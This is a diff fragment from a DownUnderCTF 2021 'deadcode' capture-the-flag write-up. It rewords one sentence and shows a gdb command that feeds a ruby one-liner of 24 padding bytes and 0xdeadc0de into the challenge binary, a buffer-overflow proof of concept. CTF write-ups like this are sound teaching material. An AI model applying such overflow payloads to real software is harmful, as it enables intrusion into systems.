dystobic/writeups/DUCTF/2021/deadcode/README.md

 with 24 bytes and then get to write `0xdeadc0de` to our target address.

 ## Solution
-Let's use a quick ruby exploit for proof of concept.
+Let's pull off a quick ruby exploit for proof of concept.

 ```
 (gdb) r <<< $(ruby -e 'print "A"*24 + "\xde\xc0\xad\xde"')